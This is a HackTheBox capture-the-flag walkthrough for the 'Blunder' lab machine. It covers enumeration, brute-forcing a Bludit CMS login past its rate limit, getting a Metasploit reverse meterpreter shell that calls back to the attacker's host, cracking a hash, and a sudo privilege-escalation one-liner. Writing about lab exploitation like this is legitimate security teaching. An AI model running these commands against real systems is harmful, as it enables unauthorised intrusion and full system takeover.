Blunder HackTheBox Walkthrough
This is Blunder HackTheBox machine walkthrough. In this walkthrough I will demonstrate you how I successfully exploited this machine and got root flag. Before starting let’s know something about Blunder machine. It is a Linux machine and is given difficulty level low by it’s maker with IP address 10.10.10.191.
Now I will show you step by step procedure how to get root flag in blunder machine.
First of all connect your PC with VPN so that you can get access to the lab and ping the IP 10.10.10.191 to make confirm that you are connected with blunder machine. I started by scanning the IP address 10.10.10.191, so that I could get some hint to start. Nmap, a port scanner gave the following results.
Scanning the Machine
$nmap -sC -sC -oN scan 10.10.10.191
Only two ports open??
Let’s perform full port scan in case there may be services running on some other ports which is not listed in nmap’s top 1000 ports.
After full port scan the same result appears.
$nmap -sC -sV -p- -oN full_scan 10.10.10.191
Tip: It is good idea to perform full port scan during CTF hunting or Penetration Testing because there may be chances that some port are open which don’t come under top 1000 ports of nmap.
Port 21 and 80 is shown. Apache2 web server is running on port 80. After some enumeration found website is running on
Bludit CMS. And the version is
3.9.2 from this URL http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2
As usual my next step is to search if any exploit is available for given CMS. Just googled
Bludit CMS 3.9.2 exploit and found this appropriate link. For more details google
CVE-2019-17240. Also searchsploit give this result.
There is a metasploit module present for Bludit. After opening this in metasploit I found it requires
Password. So we needed username and password to use this module
msf5>show info exploit/linux/http/bludit_upload_images_exec
Left it here and moved forward to find some other information. Used directory brute forcing using
dirsearch and wordlist
directory-list-2.3-small.txt, didn’t find any interesting file. Got some hint from HTB forum about txt file so tried to
FUZZ for hidden text files in the URL.
$wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100
todo.txt. After reading the content at http://10.10.10.191/todo.txt it appears that
fergus is the user. Added it to my note. And started further enumeration.
Tip: It is a good idea to make notes of all interesting finding side by side because sometimes they show you the way how to proceed further.
Now we have got username and we need password. Let’s make our own wordlist using
cewl, a famous wordlist creator.
Creating Custom Wordlist
$cewl -d 3 -m 5 -w custom_wordlist.txt
Modify the script at https://rastating.github.io/bludit-brute-force-mitigation-bypass/ as given below. In username use
fergus because we want to brute force on user fergus and in fname use the name of custom wordlist which you have created using cewl command. In my case it is
custom_wordlist.txt. Save it as
poc.py and run it
So we have the credentials
fergus : RolandDeschain . It’s time to exploit and get remote shell on our PC.
We have two ways to get shell.
1. Either use metasploit module or
2. Manually upload file to the website by logging in http://10.10.10.191/admin/ with creds fergus : RolandDeschain and intercept using Burp Suite to modify requests. For more info visit https://github.com/bludit/bludit/issues/1079 this link.
I preferred first because it don’t require much effort and you know well how lazy we are in doing things manually if automated things are present. 🙂
Try to use payload
php/meterpreter_reverse_tcp instead of payload
php/meterpreter/reverse_tcp if later failed to get you proper meterpreter shell
Getting User Shell
$ msfdb run
msf5 > search bludit
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.15.87
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
meterpreter > sysinfo
Alright, we have got a meterpreter shell. Used
$shell command to upgrade it to system shell and further to fully qualified Linux shell
meterpreter > shell
$python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ export TERM=xterm-256color
So we are in the Blunder HTB machine. Let us grab
user flag. Inside home directory two users
shaun are present. User flag is inside hugo folder. But
www-data don’t have permission to read it. Only hugo has permission to read it. Tried
$su hugo in case hugo and fergus have same password but login failed possibly due to incorrect password. To access user flag we have to login with hugo. After manual enumeration found a file
users.php inside the directory
Got password along with its salt
Now we have to crack this password. Hash identifier gave it is a
Identify Type of Hash
Tried to crack using
rockyou.txt wordlist but could not crack. So tried https://cmd5.com/ site and successfully cracked the hash.
The password is Password120. So the credential is
Hugo : Password120.
Switch user to hugo
Grab User Flag
Let’s check what special permission does hugo has.
Tip: Whenever you get a shell try to execute
$sudo -lcheck what special command [*] the current user can run. And try to google ‘how to escalate privilege using [*] command’. You may get your answer easily. For example, in this case google (ALL, !root) /bin/bash
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
(ALL, !root) /bin/bash got our privilege escalation vector in first link viz. vulnerable version of sudo. See this link.
After reading the exploit PoC we can easily get our root shell in just one command. Let’s do it
Getting Root Shell
$sudo -u#-1 /bin/bash
Give the password Password120
Grab Root Flag
Grab the root flag from root folder
This is how I got root to the blunder HackTheBox machine. Hope you guys have got something to learn from my approach. Have any issue and question please let me know at [email protected] and in comment section . Thanks for reading this walkthrough.
Want more walkthrough on HackTheBox always visit ethicalhacs.com.